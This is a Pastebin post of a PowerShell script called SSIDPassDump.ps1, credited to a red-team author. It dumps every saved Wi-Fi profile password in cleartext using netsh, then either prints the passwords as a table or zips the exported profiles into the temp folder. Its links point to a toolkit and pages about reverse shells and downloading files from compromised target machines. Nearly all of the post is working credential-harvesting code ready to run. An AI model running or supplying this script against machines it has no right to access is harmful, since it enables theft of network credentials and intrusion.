r00t-3xp10it

SSIDPassDump.ps1

Nov 24th, 2020 (edited)
741
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <#
  2. .SYNOPSIS
  3.    cmdlet to dump SSID Wifi profiles passwords
  4.  
  5.    Author: r00t-3xp10it (SSA RedTeam @2020)
  6.    Tested Under: Windows 10 - Build 18363
  7.    Required Dependencies: netsh
  8.    Optional Dependencies: none
  9.    PS cmdlet Dev version: v1.0
  10.  
  11. .DESCRIPTION
  12.    cmdlet to dump SSID Wifi profiles passwords into terminal windows
  13.    or dump credentials into a zip file under $Env:TMP directory.
  14.  
  15. .EXAMPLE
  16.    PS C:\> Get-Help .\SSIDPassDump.ps1 -full
  17.    Access This cmdlet Comment_Based_Help
  18.  
  19. .EXAMPLE
  20.    PS C:\> .\SSIDPassDump.ps1 -FileName MyDump.zip
  21.    This parameter can only be used with [<-DumpType Zip>]
  22.    parameter to be abble to rename the zip dump file
  23.  
  24. .EXAMPLE
  25.    PS C:\> .\SSIDPassDump.ps1 -DumpType Terminal
  26.    Display SSID Wifi passwords dump into terminal windows
  27.  
  28. .EXAMPLE
  29.    PS C:\> .\SSIDPassDump.ps1 -DumpType Zip
  30.    Dump SSID Wifi profiles passwords into a zip file
  31.  
  32. .EXAMPLE
  33.    PS C:\> .\SSIDPassDump.ps1 -DumpType Zip -Storage $Env:USERPROFILE\Desktop
  34.    Dump SSID Wifi profiles passwords into a zip file and
  35.    store zip file under the sellected directory.
  36.  
  37. .INPUTS
  38.    None. You cannot pipe objects into webserver.ps1
  39.  
  40. .OUTPUTS
  41.    This cmdlet does not produce outputs if used
  42.    [< -DumpType Zip >] cmdlet parameter
  43.  
  44. .LINK
  45.     https://github.com/r00t-3xp10it/venom
  46.     https://github.com/r00t-3xp10it/venom/tree/master/aux/webserver.ps1
  47.     https://github.com/r00t-3xp10it/venom/wiki/CmdLine-&-Scripts-for-reverse-TCP-shell-addicts
  48.     https://github.com/r00t-3xp10it/venom/wiki/cmdlet-to-download-files-from-compromised-target-machine
  49. #>
  50.  
  51. ## Non Positional cmdlet named parameters
  52. [CmdletBinding(PositionalBinding=$false)] param(
  53.    [string]$FileName="SSIDump.zip",
  54.    [string]$DumpType="Terminal",
  55.    [string]$Storage="$Env:TMP"
  56. )
  57.  
  58. $Initial_Path = (pwd).Path
  59. ## Capture wlan interface passwords (SSID Keys)
  60. If($DumpType -ieq "Terminal"){
  61.    ## Display SSID Wifi passwords dump into terminal windows
  62.    $profiles = netsh wlan show profiles|findstr /C:"All User Profile"
  63.    $DataParse = $profiles -replace 'All User Profile     :','' -replace ' ',''
  64.  
  65.    ## Create Data Table for output
  66.    $mytable = new-object System.Data.DataTable
  67.    $mytable.Columns.Add("SSID name") | Out-Null
  68.    $mytable.Columns.Add("Password") | Out-Null
  69.  
  70.    foreach($Token in $DataParse){
  71.       $DataToken = netsh wlan show profile name="$Token" key=clear|findstr /C:"Key Content"
  72.       $Key = $DataToken -replace 'Key Content            : ','' -replace ' ',''
  73.       ## Put results in the data table  
  74.       $mytable.Rows.Add("$Token",
  75.                         "$Key") | Out-Null
  76.    }
  77.    ## Display Table
  78.    $mytable|Format-Table -AutoSize
  79. }Else{
  80.    ## Dump SSID Wifi profiles passwords into a zip file
  81.    If(-not(Test-Path "$Storage\SSIDump")){New-Item "$Storage\SSIDump" -ItemType Directory -Force|Out-Null}
  82.    cd $Storage\SSIDump;netsh wlan export profile folder=$Storage\SSIDump key=clear|Out-Null
  83.    Compress-Archive -Path "$Storage\SSIDump" -DestinationPath "$Storage\$FileName"
  84.    Write-Host "SSID Dump stored under: $Storage\$FileName" -ForeGroundColor Yellow
  85.    cd $Initial_Path
  86. }
  87. If(Test-Path "$Storage\SSIDump"){Start-Sleep -Seconds 2;Remove-Item "$Storage\SSIDump" -Recurse -Force|Out-Null}
  88.  
RAW Paste Data